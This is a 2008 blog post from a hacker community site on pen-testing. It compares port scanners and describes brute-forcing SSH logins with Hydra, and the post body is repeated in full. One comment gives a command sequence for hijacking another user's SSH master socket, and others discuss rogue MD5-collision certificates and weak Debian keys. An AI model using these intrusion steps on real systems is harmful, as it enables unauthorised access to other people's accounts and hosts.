Pen-Tests in 2008 and Why don't you crack ssh?
I made a pen-test lately to a medium size American firm and it seems public remote exploits for devices such as Juniper, Netopia, Cisco (telnet) and default Linux services has gone to as low as one or two for each since 2004.
Since any respectable firm has windows update turned on and the Fedora style Linux distribution also has automatic updates, I got to the conclusion that the cycle of:
Safe --> Research --> Exploit --> Public Disclosure --> Patch --> Automatic Update --> Safe
results that Black-Box Penetration Testers don't have much to show the client except for configuration errors and a few user enumerations and less critical stuff that don’t get fixed by the vendors.
The solution for that would be that pen-testers will find their own exploits. That is why in the last years most of the written tools are fuzzers.
Cisco, Netopia, Juniper and Linux services were already fuzzed as hell before they were shipped to clients so this doesn't seem to be a good approach to the problem.
My suggestions:
1) if you are a pen-tester, research and discover your own vulnerabilities and create workarounds for them, show it to your client and keep it to yourself!
2) If you are a researcher, supply a working P.O.C because the pen-testers doesn't have time to buy that machine and develop a working shellcode to work with your vulnerability
Being 13 hops away from the machines I had been pen-testing I was amazed to see that products which are extremely mainstream and trusted fail for such a simple task.
I used Nmap to scan the network range (of course with -P0 or -PN in the new version) and just two HTTP servers were discovered from 8 hosts, as I am not a big fan of Nmap I returned to what I was using in the past GFI Languard.
I scanned the targets using GFI Languard (which is a great tool when used inside local networks) and I set complete TCP and UDP ports scan with 20 seconds TCP timeout and 8 seconds UDP timeout, this timeouts are EXTREME and should achieve the most accurate results. The scan results were very poor, detecting about 3 open ports on 8 machines!!! Of course I checked nothing else is running on my internet connection to make sure this was just a bad dream. I scanned again and one more port was discovered, SSH!
I decided this cannot be true and I returned to Nmap using the "slow and Intensive" scan and the results were better, about 5 TCP ports and 1 SNMP, I thought “still no way that is all they got!”
Finally, I installed the latest version of Nessus (Tenable Nessus 3), configured it to be with high timeouts and ran the scan. The results were AMAZING!!! It didn't miss any of what the other scanners have found and he discovered 15 more UDP ports and 7 more TCP ports. From now on, I am only scanning with Nessus, my time is worth it!
Now that I had some interesting services to attack, I wanted to try and log into one of the Linux machines using SSH. To me it sounds simple, "I will download a dictionary/brute force SSH tool and that's it". Apparently not!
There is an ancient perl script running all across the web to do SSH and "expect” THAT-IS-LAME. Some guy really agreed about that and wrote a ruby script to use the lib NET::SSH and automate attempts, quite similar to Tim's SShatter perl script, that is nice but still no multithreading supported.
Of course you may think "Why not use T.H.C Hydra?", the answer would be because by default it’s not configured to be compiled with LIBSSH and you got to get some libs, you will burn a few hours to make it work!
My dear friend "Kiril Nesenko" AKA "axi1es" wrote for YOU guys the script for "The Common Lazy Fedora Guy" which will download hydra, the SSH and other libs, will configure and compile it and will execute the Hydra all automatically, enjoy! :)
http://www.linkstofiles.com/install_hydra-5.4-src+ssh.sh
Since any respectable firm has windows update turned on and the Fedora style Linux distribution also has automatic updates, I got to the conclusion that the cycle of:
Safe --> Research --> Exploit --> Public Disclosure --> Patch --> Automatic Update --> Safe
results that Black-Box Penetration Testers don't have much to show the client except for configuration errors and a few user enumerations and less critical stuff that don’t get fixed by the vendors.
The solution for that would be that pen-testers will find their own exploits. That is why in the last years most of the written tools are fuzzers.
Cisco, Netopia, Juniper and Linux services were already fuzzed as hell before they were shipped to clients so this doesn't seem to be a good approach to the problem.
My suggestions:
1) if you are a pen-tester, research and discover your own vulnerabilities and create workarounds for them, show it to your client and keep it to yourself!
2) If you are a researcher, supply a working P.O.C because the pen-testers doesn't have time to buy that machine and develop a working shellcode to work with your vulnerability
Being 13 hops away from the machines I had been pen-testing I was amazed to see that products which are extremely mainstream and trusted fail for such a simple task.
I used Nmap to scan the network range (of course with -P0 or -PN in the new version) and just two HTTP servers were discovered from 8 hosts, as I am not a big fan of Nmap I returned to what I was using in the past GFI Languard.
I scanned the targets using GFI Languard (which is a great tool when used inside local networks) and I set complete TCP and UDP ports scan with 20 seconds TCP timeout and 8 seconds UDP timeout, this timeouts are EXTREME and should achieve the most accurate results. The scan results were very poor, detecting about 3 open ports on 8 machines!!! Of course I checked nothing else is running on my internet connection to make sure this was just a bad dream. I scanned again and one more port was discovered, SSH!
I decided this cannot be true and I returned to Nmap using the "slow and Intensive" scan and the results were better, about 5 TCP ports and 1 SNMP, I thought “still no way that is all they got!”
Finally, I installed the latest version of Nessus (Tenable Nessus 3), configured it to be with high timeouts and ran the scan. The results were AMAZING!!! It didn't miss any of what the other scanners have found and he discovered 15 more UDP ports and 7 more TCP ports. From now on, I am only scanning with Nessus, my time is worth it!
Now that I had some interesting services to attack, I wanted to try and log into one of the Linux machines using SSH. To me it sounds simple, "I will download a dictionary/brute force SSH tool and that's it". Apparently not!
There is an ancient perl script running all across the web to do SSH and "expect” THAT-IS-LAME. Some guy really agreed about that and wrote a ruby script to use the lib NET::SSH and automate attempts, quite similar to Tim's SShatter perl script, that is nice but still no multithreading supported.
Of course you may think "Why not use T.H.C Hydra?", the answer would be because by default it’s not configured to be compiled with LIBSSH and you got to get some libs, you will burn a few hours to make it work!
My dear friend "Kiril Nesenko" AKA "axi1es" wrote for YOU guys the script for "The Common Lazy Fedora Guy" which will download hydra, the SSH and other libs, will configure and compile it and will execute the Hydra all automatically, enjoy! :)
http://www.linkstofiles.com/install_hydra-5.4-src+ssh.sh
Add a Comment
-
Comment by dozzyjean on July 16, 2009 at 8:15pm -
Hey your questions are all ok based on ssh and rvdh i like your spirit allot keep it up dude, base don hackign ssh maybe these can be lil bit useful for all
hostname
kdc
host kdc
showmount -e
showmount -a
cd /home
ls
su - bob
cd .ssh
ssh host2
ssh-keygen -t rsa
cp id_rsa.pub authorized_keys
hostname
WAIT FOR THE TARGET TO SSH IN MASTER MODE
ssh -M -S socket host2
NOW HIJACK TARGET SSH SOCKET
su - bob
ssh -S socket host2
If that looks okay to you then all is fine with all. hope to hear from all dude.
-
Comment by vnsec on March 2, 2009 at 2:04pm -
Try this, man! http://freereverseip.com
==>The best service to find all websites on a host
And more...
-
Comment by univax on January 5, 2009 at 10:04pm - Muchas gracias.
-
Comment by The-Insider on January 5, 2009 at 10:01pm -
http://www.win.tue.nl/hashclash/rogue-ca/
http://blogs.zdnet.com/security/?p=2339
http://blogs.zdnet.com/security/?p=2341
http://blogs.zdnet.com/security/?p=2343
http://www.google.com/search?q=MD5+CA+fake&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:he:official&client=firefox-a
http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Ahe%3Aofficial&hs=C4c&q=MD5+Collision+certificates&btnG=Search
-
Comment by univax on January 5, 2009 at 8:48pm
-
The_Insider, can you give me a link to any article about the faked CA key incident you mentioned?
We've been discussing the md5 collision issue in another forum, and there is a debate about whether this is actually a feasible threat or if the major CA's have already been adequately notified and corrective action taken.
Any additional info you can point me to is appreciated.
Thanks.
-
Comment by The-Insider on January 5, 2009 at 8:40pm
- thx :)
-
Comment by rvdh on January 5, 2009 at 7:54pm - I know, but I found the OpenSSL issue one the highlights last year. Pretty duped that someone can be so stupid. And yes, Nessus is great. I would recommended it highly for any pentester. Btw, you have some nice research on browsers, I've skimmed through your site last evening, excellent stuff.
-
Comment by The-Insider on January 4, 2009 at 7:26pm
- These days we also have the certificate validation issues, because it is feasible to create collisions for MD5s and in many cases (such as SSL) the MD5 of the keys are matched, then attackers can create a valid "fake/spoofed" key like the case in the last few days where they faked the key of the Certificate Authority itself.
-
Comment by rvdh on January 4, 2009 at 6:55pm
- Oh yes the OpenSSL issue, that's true. if it's signed by OpenSLL than you have problem. Given this thought, I wonder how many certs are still signed with it. Would be cool to do a survey on this.
-
Comment by The-Insider on January 4, 2009 at 6:32pm
-
Yes, but there are other issues, also with keys.
For example the bug that was found on debian machines which the key generator was only randomizing in a range of a WORD(16 bits) which resulted in ANY DEBIAN MACHINE HAVING ONLY A MAXIMUM OF 65536 POSSIBLE SSH KEYS, which is much worst then dictionary :)
© 2009 Created by pdp on Ning. Create a Ning Network!
You need to be a member of House of Hackers to add comments!
Join this Ning Network